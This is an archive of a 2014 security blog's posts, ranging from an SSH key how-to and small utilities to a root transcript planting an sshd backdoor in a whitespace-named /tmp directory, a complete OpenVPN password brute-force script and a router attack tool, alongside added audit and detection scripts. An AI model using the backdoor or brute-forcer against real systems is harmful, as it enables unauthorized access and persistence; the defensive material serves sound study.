Jan 17, 2014

Honeypot DNS and amplification attacks

A low-bandwidth open resolver that automatically observes DNS amplification attacks and reports the targeted IP addresses.
Warning: the table contains false positives and legitimate domains (e.g. google.com, openresolverproject.org, etc.).


Source: http://www.nothink.org/honeypot_dns.php


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: SSH or SCP without password


  1. On the client run the following commands:
    $ mkdir -p $HOME/.ssh
    $ chmod 0700 $HOME/.ssh
    $ ssh-keygen -t dsa -f $HOME/.ssh/id_dsa -P ''
    
    This should result in two files, $HOME/.ssh/id_dsa (private key) and $HOME/.ssh/id_dsa.pub (public key).
  2. Copy $HOME/.ssh/id_dsa.pub to the server.
  3. On the server run the following commands:
    $ cat id_dsa.pub >> $HOME/.ssh/authorized_keys2
    $ chmod 0600 $HOME/.ssh/authorized_keys2
    
    Depending on the version of OpenSSH the following commands may also be required:
    $ cat id_dsa.pub >> $HOME/.ssh/authorized_keys
    $ chmod 0600 $HOME/.ssh/authorized_keys
    
    An alternative is to create a link from authorized_keys2 to authorized_keys:
    $ cd $HOME/.ssh && ln -s authorized_keys2 authorized_keys
    
  4. On the client test the results by ssh'ing to the server:
    $ ssh -i $HOME/.ssh/id_dsa server
    
  5. (Optional) Add the following to $HOME/.ssh/config on the client:
    Host server
             IdentityFile ~/.ssh/id_dsa
    
    This allows ssh access to the server without having to specify the path to the id_dsa file as an argument to ssh each time. 
Source: http://csua.berkeley.edu/~ranga/notes/ssh_nopass.html
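
An added audit script, not part of the original how-to, that checks the result of the steps above: the permissions of the .ssh directory and key files, and the key type of each entry in authorized_keys and authorized_keys2. It flags ssh-dss entries because OpenSSH has disabled DSA keys by default since release 7.0; the function names and the script name are assumptions of this example.

```sh
#!/bin/sh
# Added example: audit an ~/.ssh directory set up as in the steps above.
# Prints one finding per line and nothing when every check passes.

file_mode() {
    # Octal permission bits of the link target (GNU stat, then BSD stat).
    stat -L -c '%a' "$1" 2>/dev/null || stat -L -f '%Lp' "$1"
}

audit_ssh_dir() {
    dir=$1
    mode=$(file_mode "$dir")
    [ "$mode" = 700 ] || echo "PERM $dir mode $mode (expected 700)"

    for f in "$dir/authorized_keys" "$dir/authorized_keys2"; do
        [ -f "$f" ] || continue
        mode=$(file_mode "$f")
        case $mode in
            ?00) ;;   # no group/other access, e.g. 600 or 400
            *)   echo "PERM $f mode $mode (expected 600)" ;;
        esac
        n=0
        while IFS= read -r line || [ -n "$line" ]; do
            n=$((n + 1))
            case $line in ''|'#'*) continue ;; esac
            # Options such as from="..." may precede the key type, so take
            # the first field that looks like a key type.
            ktype=$(printf '%s\n' "$line" |
                grep -Eo '(^|[ ,"])(ssh-(dss|rsa|ed25519)|ecdsa-sha2-[a-z0-9-]+|sk-[a-z0-9@.-]+) ' |
                head -n 1 | tr -d ' ,"')
            case $ktype in
                ssh-dss) echo "WEAK $f:$n ssh-dss (DSA) key" ;;
                '')      echo "UNKNOWN $f:$n unrecognised key type" ;;
            esac
        done < "$f"
    done
}

# Run as: sh audit_ssh.sh "$HOME/.ssh"   (the script name is a placeholder)
if [ "$#" -gt 0 ]; then audit_ssh_dir "$1"; fi
```

When authorized_keys is a symlink to authorized_keys2, as in step 3, each finding is reported once per name.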






Jan 16, 2014

Tools: ZynOS (TP-LINK TD-W8951ND Router) tool for automated attacks on a range of IPs


With these scripts you can attack ZynOS routers and modify or extract
anything you want on the target router, from extracting the ISP username and
password to injecting rogue DNS server IPs.
 
 
Source: https://github.com/MrNasro/zynos-attacker/ 

How to defend against it, from kifcaliph's blog:
>telnet 192.168.1.1
Password: <type your router password>
Copyright (c) 2001 - 2011 TP-LINK TECHNOLOGIES CO., LTD.
TP-LINK> sys server load
TP-LINK> sys server access ftp 1
TP-LINK> sys server access web 1
TP-LINK> sys server access icmp 1
TP-LINK> sys server access tftp 1
TP-LINK> sys server access snmp 1
TP-LINK> sys server access telnet 2
TP-LINK> sys server save
sys server: save ok



Tools: Bash Script for Checking HTTP Headers for Security

Bash script for checking HTTP headers against securityheaders.com.
git clone https://github.com/niravkdesai/securityheaders.git
cd securityheaders
chmod +x header.sh
./header.sh

Source: https://github.com/niravkdesai/securityheaders




Jan 15, 2014

Tools: Python Lib for HTTP Agent Parser

Extracts OS, browser and other information from an HTTP User-Agent string.

Features

  • Works on Python 2.5+ and Python 3
  • Fast
  • Detects OS and Browser. Does not aim to be a full featured agent parser
  • Will not turn into django-httpagentparser ;)
 
>>> import httpagentparser
>>> s = "Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.9 (KHTML, like Gecko) \
        Chrome/5.0.307.11 Safari/532.9"
>>> print(httpagentparser.simple_detect(s))
('Linux', 'Chrome 5.0.307.11')
>>> print(httpagentparser.detect(s))
{'os': {'name': 'Linux'},
 'browser': {'version': '5.0.307.11', 'name': 'Chrome'}}

>>> s = "Mozilla/5.0 (Linux; U; Android 2.3.5; en-in; HTC_DesireS_S510e Build/GRJ90) \
        AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"
>>> print(httpagentparser.simple_detect(s))
('Android Linux 2.3.5', 'Safari 4.0')
>>> print(httpagentparser.detect(s))
{'dist': {'version': '2.3.5', 'name': 'Android'},
'os': {'name': 'Linux'},
'browser': {'version': '4.0', 'name': 'Safari'}}
 
 





Howto: Script to download SlideShare slide images and convert them to a PDF file

A script that downloads the slide images of a SlideShare presentation and converts them to a PDF file.

#!/bin/bash

if [ -z "$1" ]
then
        echo "Usage: ./dl-slideshare.sh URL"
        echo "Example: ./dl-slideshare.sh http://www.slideshare.net/bbaskin/malware-intelligence"
        exit 1
fi

savepath="/tmp/slideshare"

# Create the working directory if it does not exist yet
mkdir -p "$savepath"
path=$(pwd)

# Presentation name = last path component of the URL
name=$(echo "$1" | grep -Eoi '/[a-zA-Z0-9-]+$' | cut -d/ -f 2)

#listurl=`curl $1 | grep http://image.slidesharecdn.com/.*1024.jpg | awk -F= '{ print $6$7 }' | cut -d' ' -f 1`

##### Create image url
listurl=$(curl -s "$1" | grep -Eoi 'data-full.*http://image.slidesharecdn.com/.*1024.jpg\?cb=[0-9]+' | cut -d\" -f 2)

cd "$savepath" || exit 1

##### Loop Download List Picture
for i in $listurl
do
        # Run wget directly; wrapping it in backticks would execute its output
        wget "$i"
done

#### Convert all picture to pdf
convert $(ls -v) "$path/$name.pdf"

rm -f "$savepath"/*





Jan 14, 2014

Howto: simplest sshd backdoor ever

I got this code from Twitter (@kingcorp).

# id
uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)
# uname -a
FreeBSD BSDPWNED 9.0-RELEASE ...
BSDPWNED# mkdir /tmp/" "
BSDPWNED# ln -sf /usr/sbin/sshd /tmp/" "/su
BSDPWNED# /tmp/" "/su -oPort=31337
BSDPWNED# ssh -lroot -p31337 0
root@0's password: <any password>
Last login: Tue Jan 14 07:24:49 2014 from 127.0.0.1
FreeBSD 9.0-RELEASE (BSDPWNED) #0: Sun Jun 24 21:04:36 CEST 2012
BSDPWNED# id
uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)
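
An added detection example, not part of the original post or tweet, that hunts for what the transcript above leaves behind: the sshd binary reachable under a name other than sshd, a directory whose name is only whitespace, and a process running the sshd binary under another name. The function names, the script name, the optional PROCROOT argument and the Linux procfs layout are assumptions of this example.

```sh
#!/bin/sh
# Added example: hunt for the artefacts visible in the transcript above.
# Needs a find with -samefile and -maxdepth (GNU and BSD find have both).

# find_sshd_aliases SSHD DIR...
# Paths that are the same file as SSHD (symlink or hard link) but are not
# named "sshd", like /tmp/" "/su in the transcript.
find_sshd_aliases() {
    sshd=$1; shift
    # With -L, find tests the link target, so -samefile matches symlinks too.
    find -L "$@" -xdev -type f -samefile "$sshd" ! -name sshd 2>/dev/null
}

# find_blank_dirs DIR...
# Directories whose name consists only of whitespace, like /tmp/" ".
find_blank_dirs() {
    find "$@" -xdev -type d -name '[[:space:]]*' ! -name '*[![:space:]]*' 2>/dev/null
}

# find_sshd_procs SSHD [PROCROOT]
# Linux only (assumption: a procfs with PID/exe and PID/comm). Prints
# "PID NAME" for processes running the SSHD binary under another name.
find_sshd_procs() {
    sshd=$1; proc=${2:-/proc}
    find -L "$proc" -maxdepth 2 -name exe -samefile "$sshd" 2>/dev/null |
    while IFS= read -r exe; do
        pdir=${exe%/exe}
        comm=$(cat "$pdir/comm" 2>/dev/null)
        [ "$comm" = sshd ] || echo "${pdir##*/} $comm"
    done
}

# Run as: sh hunt_sshd_alias.sh /usr/sbin/sshd /tmp /var/tmp /dev/shm
if [ "$#" -ge 2 ]; then
    find_sshd_aliases "$@"
    find_sshd_procs "$1"
    shift
    find_blank_dirs "$@"
fi
```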
 



Jan 12, 2014

Tools: Bruteforce Openvpn Tool

#!/bin/bash
# By Galkan 

openvpn_binary_path="/usr/sbin/openvpn"

function brute_force()
{
 brute_file="`mktemp /tmp/brute_force_openvpn_$USER.XXXXXX`"
 output_file="`mktemp /tmp/brute_force_openvpn_$USER.XXXXXX`"

 rm -f $brute_file $output_file

 user_name="$1"
 password="$2"

 echo "$user_name" > "$brute_file"
 echo "$password" >> "$brute_file"

 $openvpn_binary_path --config $openvpn_config_file --auth-user-pass "$brute_file" > $output_file &
 
 while [ 1 ]
 do
  if [ -f "$output_file" ]
  then
   cat $output_file | grep -q "Options error"
   if [ $? -eq 0 ]
   then
    echo "ERROR: `cat $output_file | grep "Options error"`"
    break
   fi

   cat $output_file | grep -q "SIGTERM\[soft,auth-failure\] received, process exiting" 
   if [ $? -eq 0 ]
   then
    echo "$user_name:$password -> FAILURE"
    break 
   fi

   cat $output_file | grep -q "Initialization Sequence Completed" 
   if [ $? -eq 0 ]
   then
    echo "$user_name:$password -> SUCCESS"
    break 
   fi
  else
   continue
  fi
 done
 
 openvpn_pid="`pidof openvpn`"
 kill -9 $openvpn_pid >/dev/null 2>&1

 rm -f $brute_file $output_file 
}



function main()
{
 dict_file="$1"

 for vpn_file in $openvpn_binary_path $openvpn_config_file $dict_file
 do
  if [ ! -f "$vpn_file" ]
  then
   echo "$vpn_file : Dosyasi Sistemde Bulunamadi !!!"
   exit 3
  fi
 done


 cat $dict_file | while read -r line
 do
  user_name="`echo "$line" | cut -d ":" -f1`"
  password="`echo "$line" | cut -d ":" -f2`"

  result="`brute_force "$user_name" "$password"`"
  echo "$result"

  echo "$result" | grep -Eq "^ERROR"
  if [ $? -eq 0 ]
  then
   break
  fi 
 done
}



if [ ! $# -eq 2 ]
then
 echo "Kullanim: $0 <dict_file> <vpn_config_file>"
 exit 1
else
 dict_file="$1"
 openvpn_config_file="$2"

 main "$dict_file" 
fi 
 
Source: https://raw.github.com/galkan/tools/master/openvpn-brute/openvpn_brute_force.sh 





Tools: Proxyp Multithreaded Proxy Enumeration Utility

Proxyp is a small multithreaded Perl script written to enumerate latency, port numbers, server names, & geolocations of proxy IP addresses.
This script started as a way to speed up use of proxychains, which is why I've added an append option for resulting live IP addresses to be placed at the end of a file if need be.


Source: http://sourceforge.net/projects/proxyp/


